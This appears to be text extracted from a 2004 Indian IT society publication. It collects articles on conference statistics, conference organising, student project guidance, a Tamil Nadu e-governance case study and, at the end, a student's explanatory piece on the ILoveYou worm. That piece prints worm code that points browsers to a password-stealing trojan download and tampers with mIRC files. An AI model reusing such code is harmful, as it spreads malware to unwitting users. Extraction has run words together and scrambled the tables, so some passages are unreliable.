Number of authors per paperYear 1 2 3 4 5 6 71998 6 21 8 1 1 0 01999 8 12 13 8 1 2 02000 5 15 12 1 0 0 12001 3 20 24 5 1 0 02002 4 16 17 4 0 2 02003 9 34 33 4 3 0 0

Table 1

OITS-2004

22

Multiplicity patterns

Fig 11998

Fig 2

age of papers involving overseas au thors yearwise

Fig 3Year

Year

OITS-2004

23

till date Leading the pack are IIT Kharagpurwith thirty-five papers and IIT Guwahati withtwenty-seven Among the other IITs IIT Kanpurhas seventeen while IIT Bombay and IIT Madrashave nine apiece Among the other InstitutesJadavpur University has contributed seventeenpapers while University of Hyderabad hascontributed ten The list of the leading Institutesin terms of number of papers alongwith ayearwise breakdown is given in Table 3

Another interesting trend that can beobserved here is that while the USA leadsoverseas list none of the Institutes figure in thelist while one Institute from Japan figures in thelist It can be concluded that the papers from the

Country 1998 1999 2000 2001 2002 2003 TotalUSA 6 10 3 8 1 7 35

Netherlands 2 0 1 0 0 0 3Japan 2 3 1 3 1 1 11

Australia 3 0 1 1 2 3 10Kuwait 1 0 0 0 0 0 1China 1 0 0 0 0 1 2

Sweden 1 0 0 0 0 0 1UK 1 0 0 0 2 3 6

Portugal 1 0 0 0 0 0 1Italy 1 2 1 1 1 0 6

Canada 1 1 0 0 1 3 6Taiwan 0 1 0 0 0 0 1Brazil 0 3 0 0 0 0 3

Finland 0 1 0 0 0 0 1Mexico 0 1 0 0 0 0 1

Germany 0 1 1 0 0 0 2Malaysia 0 0 1 0 1 1 3

Macao 0 0 0 1 0 0 1Thailand 0 0 0 1 0 0 1Norway 0 0 0 1 1 0 2

Singapore 0 0 0 0 1 0 1Serbia amp

Montenegro 0 0 0 0 0 1 1Tanzania 0 0 0 0 0 1 1

Table 2USA have been scattered across the countrywhile those from Japan have been concentratedin some particular Institutes3 The Topics

As far the topics are concernedNetworking leads the table with a total ofthirtythree papers Among other topics ofprominence are Soft Computing with thirty-onepapers Web-based computing with eighteenand Parallel amp Distributed Computing withsixteen papers Even though there have beenpapers from almost all areas of ComputerScience none of those areas have featuredconsistently in these conferences

OITS-2004

24

Trends in papers having authors from Orissa

Fig 4

Bibliography1 Mahapatra RN ed CIT 98 Trends in

Information Technology Tata McGraw-HillNew Delhi

2 Mohanty H and Baral C ed CIT 99 Trendsin Information Technology Tata McGraw-Hill New Delhi

3 Ghosh RK and Misra D ed CIT 2000Proceedings of Third InternationaConference on Information Technology TataMcGraw-Hill New Delhi

Institute 1998 1999 2000 2001 2002 2003 TotalIIT Kharagpur India 5 0 3 8 5 15 36IIT Guwahati India 1 7 4 6 5 4 27

Jadavpur University India 5 3 0 5 2 2 17IIT Kanpur India 3 1 1 6 2 4 17

University of HyderabadIndia 0 1 0 5 1 3 10

IIT Bombay India 1 3 2 1 1 1 9IIT MadrasIndia 0 0 1 2 3 3 9Iwate PrefecturalUniversity Japan 2 1 1 2 1 1 8

Table 34 Pujari AK and Mohapatra P ed CIT 2001

Proceedings of Fourt InternationalConference on Information Technology TataMcGraw-Hill New Delhi

5 Iyer S and Naik S ed CIT 2002 Proceedingsof Fifth International Conference onInformation Technology Tata McGraw-HillNew Delhi

6 Chakraborty G and Sarkar S ed CIT 2003Proceedings of Sixth InternationalConference on Information Technology TataMcGraw-Hill New Delhi

Year

OITS-2004

25

Conference is an academic activity thatallows researchers from a particular field topresent their findings and take suggestions andcomments from peers Academicians who arenot even presenting papers also attend theconference in order to keep themselves abreastof developments in the particular field and alsoto network with other attendees for possibleresearch collaboration In academic world thereis always the pressure of publish or perishConferences are an outlet to help academiciansto publish

While western world has already masteredthe art of holding conferences developingcountries are slowly gearing up to hosting qualityconferences A quality conference in generalrequires both quality and quantity ofparticipation until and unless the conference isvery narrowly focused Holding a conferencerequires quite a bit of pre-preparation andplanning The conference team needs to managethe logistics of interacting with a large numberof authors reviewers invited speakers potentialsponsors and delegates besides maintaining dayto day communication among all the teammembers This article enumerates the strategiesadopted to enhance both the quantity andquality aspect of an international conference1 inthe area of information technology held inDecember 2003 This conference was successfulin terms of participation management and otheraspects as expressed by various attendees of theconference and also in comparison withprevious conferences held by the same group

Experiences amp Learning from Organising anInternational Conference in a Developing Country

Laxman MohantyPhD Scholar BITS-Pilani

T-10 IIM Campus Vastrapur Ahmedabad-380015

Extending the ReachThe first and foremost challenge for a

conference is to reach to potential authors andthen attract as many delegates as possibleThough the particular conference had been heldconsecutively for last 5 years and had created aname for itself still it remained more or lessconfined to members of the parent associationand their friends It was found that faculty ofmany engineering colleges in India were notaware of the conference but on being told aboutit they showed keen interest to participate in itThus to extend the reach of the conferencefollowing strategies were adopted An e-group was created with the e-mail IDs

found from the proceedings of previousconferences Later this group was extendedusing e-mail IDs received from manypostings received in other e-groups likeBytesforall and IDs received from anotherteam member This e-group was used tobroadcast the call for paper (CFP)announcement 2 to 3 times Request was alsomade to members to forward the call forpaper to all people they knew and whowould be interested in the conference

An address list of engineering colleges ofIndia derived from the approved list ofengineering colleges of All India Council ofTechnical Education (AICTE) was preparedThis list was enriched by the addresses ofIndian Institutes of Technology (IITs)National Institutes of Technology (NITs)Indian Institutes of Information Technology

1 The author was the Organising Chair of theConference

OITS-2004

26

(IIITs) all RampD centers of Council ofScientific amp Industrial Research (CSIR) andother special institutions like Center forDevelopment of Advanced Computing (C-DAC) National Center for SoftwareTechnology (NCST) etc This list was usedto send the CFP poster so that facultyconcerned there could participate in theconference

A specific website was registered and usedto disseminate all information regarding theconference This website was also registeredwith several search engines All theconference documents carried the addressof this website The website also carried allcontact details of the organizing team

The website also carried links to four otherrelated conferences happening about at thesame time in the country and similarly thoseconference websites also provided links tothe website of this conference This crosslinking helped all the conferences to beknown to a large number of potentialparticipants

An address list of magazine and journalsrelated to IT and higher education likeUniversity News and Data Quest wasprepared and a brief write up about theconference was sent to those periodicalsMost of these magazines carried theinformation about the conference Thismethod worked well as judged from severalenquiries received which referred to thenews article in University News

Attracting Large Number of DelegatesThe second task was to attract large

number of delegates A focused effort was madefor achieving this Two separate documents wereprepared Advance Program booklet thatcontained details of the technical session and aposter for special events A symposium on ITamp Education industry session on Sustaining

Indias leadership in IT and student tutorialswere organized as three special events to havelarger public participation in the conferenceBoth the Advance Program booklet and theSpecial Events poster were sent by post to theauthors whose papers were selected and thespeakers who were invited for various talksThere were two fold reasons for this strategy 1)Authors and speakers would know details ofthe program and 2) they would use those twodocuments to invite their colleagues to theconference It was assumed that those authorswould take greater interest in spreading theinformation about the conference as comparedto the communication sent as a generic mail tothe head of the institution

The poster which contained details aboutspecific public events was distributed amongthe teachers of schools and colleges industryprofessionals and policy makers in the citywhere the conference was being held It was doneto enhance local participation in those publicevents

The conference was able to attract 246papers from 11 countries and this was almostdouble of what earlier conferences could attractIn fact this large number of papers increasedthe task of the Program Chairs beyondexpectation and they had to recruit morereviewers This also doubled the task ofinforming authors about the status of theirpapers acceptancerejection and finallydirection for final submissionCoordination Among the Organizing Team

The conference team consisted ofprofessionals working in various institutionsspread over different countries like India Japanand USA In India the members were fromdifferent cities Owing to team members beinglocated physically in different places physicalmeeting and planning were eliminatedCyberspace was extensively used to plan and

OITS-2004

27

decide various issues regarding the conferenceThree specific e-groups were created for variousrequirements Egroup1 This e-group contained the e-mail

IDs of the chairs of the conference It wasused to appraise other members regardingwho is doing what Also suggestions weresought for various issues such as publishersto be approached for proceedings who wereto be invited for keynote and special talksand which places to be included in the sightseeing tour etc

Egroup2 This e-group was a super set ofegroup1 and contained e-mail IDs of chairsof the present conference and the pastconferences It was assumed that this groupby being involved in 6 editions of thisconference (including the current one) helda large knowledgebase that can be used tosort out various policy issues regarding theconference For example issues likeregistration fee what type of tutorials andwhat facilities to be extended to variousinvited speakers were discussed anddecided upon through this e-group

Egroup3 This e-group comprised of themembers of the parent association of theconference This e-group was used to keepthe group members informed about thedevelopments of the conference and alsogalvanize support for participation andpublicity

Several members of the parent associationobserved during the conference that though theywere not actively contributing to any discussionin the e-group yet they were happy to get allstatus reports about the conference and be partof the discussions among the members

Besides these groups a large number of one-to-one and one-to-many e-mail exchanges weremade to facilitate information sharing anddecision making

It may be noted that the organizing team ofthe conference acted more like a virtual team withmembers physically located at various placesin the world Interestingly many members didnot know other members personally Thus it wasdecided that in the website the name of eachconference chair will be linked to hisherpersonal web pages so that other members canlook at those pages and become familiar withthe persons they are workingReviewing the Papers

Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

